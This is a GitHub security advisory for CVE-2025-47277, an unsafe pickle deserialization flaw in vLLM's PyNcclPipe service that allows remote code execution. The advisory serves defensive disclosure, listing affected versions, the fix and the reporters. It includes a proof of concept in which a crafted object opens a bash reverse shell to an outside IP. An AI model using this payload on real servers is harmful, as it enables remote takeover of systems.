GHSA-HJQ4-87XH-G4FV

Vulnerability from github – Published: 2025-05-20 18:04 – Updated: 2025-05-20 20:56
VLAI?
Summary
vLLM Allows Remote Code Execution via PyNcclPipe Communication Service
Details

Impacted Environments

This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.

Summary

vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.​

A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.

The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html

Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.

This issue was reported privately to PyTorch and they determined that this behavior was intentional.

Details

The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads , creating an unsafe deserialization vulnerability that can lead to ​Remote Code Execution.

  1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig

config=KVTransferConfig(
    kv_ip="0.0.0.0",
    kv_port=18888,
    kv_rank=0,
    kv_parallel_size=1,
    kv_buffer_size=1024,
    kv_buffer_device="cpu"
)

p=PyNcclPipe(config=config,local_rank=0)
p.recv_tensor() # Receive data
  1. The attacker crafts malicious packets and sends them to the PyNcclPipe service:
from vllm.distributed.utils import StatelessProcessGroup

class Evil:
    def __reduce__(self):
        import os
        cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
        return (os.system,(cmd,))

client = StatelessProcessGroup.create(
    host='172.17.0.1',
    port=18888,
    rank=1,
    world_size=2,
)

client.send_obj(obj=Evil(),dst=0)

The call stack triggering ​RCE is as follows:

vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
    -> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
        -> vllm.distributed.utils.StatelessProcessGroup.recv_obj
            -> pickle.loads

Getshell as follows:

image

Reporters

This issue was reported independently by three different parties:

  • @kikayli (Zhuque Lab, Tencent)
  • @omjeki
  • Russell Bryant (@russellb)

Fix

  • https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the TCPStore socket to the private interface as configured.
Severity ?
9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.6.5"
            },
            {
              "fixed": "0.8.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-47277"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-20T18:04:30Z",
    "nvd_published_at": "2025-05-20T18:15:46Z",
    "severity": "CRITICAL"
  },
  "details": "### Impacted Environments\n\nThis issue ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected.\n\n### Summary\nvLLM supports the use of the\u00a0`PyNcclPipe`\u00a0class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the\u00a0`PyNcclCommunicator`\u00a0class, while CPU-side control message passing is handled via the\u00a0`send_obj`\u00a0and\u00a0`recv_obj`\u00a0methods on the CPU side.\u200b \n\nA remote code execution vulnerability exists in the `PyNcclPipe` service. Attackers can exploit this by sending malicious serialized data to gain server control privileges. \n\nThe intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html\n\nUnfortunately, the default behavior from PyTorch is that the `TCPStore` interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the `TCPStore` instance to bind its socket to a specified private interface.\n\nThis issue was reported privately to PyTorch and they determined that this behavior was intentional.\n\n### Details\nThe `PyNcclPipe`  implementation contains a critical security flaw where it directly processes client-provided data using `pickle.loads`  , creating an unsafe deserialization vulnerability that can lead to \u200bRemote Code Execution.\n\n1. Deploy a `PyNcclPipe` service configured to listen on port `18888` when launched:\n```python\nfrom vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe\nfrom vllm.config import KVTransferConfig\n\nconfig=KVTransferConfig(\n    kv_ip=\"0.0.0.0\",\n    kv_port=18888,\n    kv_rank=0,\n    kv_parallel_size=1,\n    kv_buffer_size=1024,\n    kv_buffer_device=\"cpu\"\n)\n\np=PyNcclPipe(config=config,local_rank=0)\np.recv_tensor() # Receive data\n```\n\n2. The attacker crafts malicious packets and sends them to the `PyNcclPipe` service:\n\n```python\nfrom vllm.distributed.utils import StatelessProcessGroup\n\nclass Evil:\n    def __reduce__(self):\n        import os\n        cmd=\u0027/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/172.28.176.1/8888 0\u003e\u00261\"\u0027\n        return (os.system,(cmd,))\n\nclient = StatelessProcessGroup.create(\n    host=\u0027172.17.0.1\u0027,\n    port=18888,\n    rank=1,\n    world_size=2,\n)\n\nclient.send_obj(obj=Evil(),dst=0)\n```\n\nThe call stack triggering \u200bRCE is as follows:\n\n```\nvllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl\n\t-\u003e vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata\n\t\t-\u003e vllm.distributed.utils.StatelessProcessGroup.recv_obj\n\t\t\t-\u003e pickle.loads \n```\n\nGetshell as follows: \n\n![image](https://github.com/user-attachments/assets/487746ee-3b77-4e4d-99cc-d1ca08431215)\n\n### Reporters\n\nThis issue was reported independently by three different parties:\n\n* @kikayli (Zhuque Lab, Tencent)\n* @omjeki\n* Russell Bryant (@russellb)\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the `TCPStore` socket to the private interface as configured.",
  "id": "GHSA-hjq4-87xh-g4fv",
  "modified": "2025-05-20T20:56:42Z",
  "published": "2025-05-20T18:04:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47277"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/15988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7"
    },
    {
      "type": "WEB",
      "url": "https://docs.vllm.ai/en/latest/deployment/security.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM Allows Remote Code Execution via PyNcclPipe Communication Service"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.